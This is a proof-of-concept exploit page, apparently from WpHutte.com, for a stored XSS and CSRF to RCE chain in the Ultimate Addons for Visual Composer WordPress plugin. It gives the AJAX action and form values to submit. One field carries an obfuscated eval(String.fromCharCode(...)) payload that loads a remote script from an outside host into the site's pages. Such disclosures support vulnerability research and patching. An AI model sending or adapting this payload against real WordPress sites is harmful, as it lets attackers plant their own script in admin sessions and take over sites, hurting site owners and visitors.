Ultimate Addons for Visual Composer v3.16.10 - Stored XSS / CSRF -> RCE

by WpHutte.com

Notes:

For the XSS you will need to be logged to the targe website, with any role.

For the RCE you will need to be logged to the targe website as Administrator.

Tested on WordPress 4.7.3

Settings:

Target URL:
* Note, /wp-admin/admin-ajax.php gets appended automatically if needed

Controls










The Form

Form Field Name POC Data Input field
action update_ultimate_options
ultimate_smooth_scroll enable
ultimate_smooth_scroll_options[speed] 11
ultimate_smooth_scroll_options[step]
11; eval(String.fromCharCode(118,97,114,32,115,32,61,32,100,111,99,117, 109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40, 39,115,99,114,105,112,116,39,41,59,10,115,46,115,114,99,32,61,32,39,104, 116,116,112,115,58,47,47,99,100,110,46,119,112,104,117,116,116,101,46,99, 111,109,47,85,116,105,108,115,47,97,108,101,114,116,46,106,115,39,59,10, 100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110, 100,67,104,105,108,100,40,115,41,59))

Iframe for POST result


POC by WPHutte.com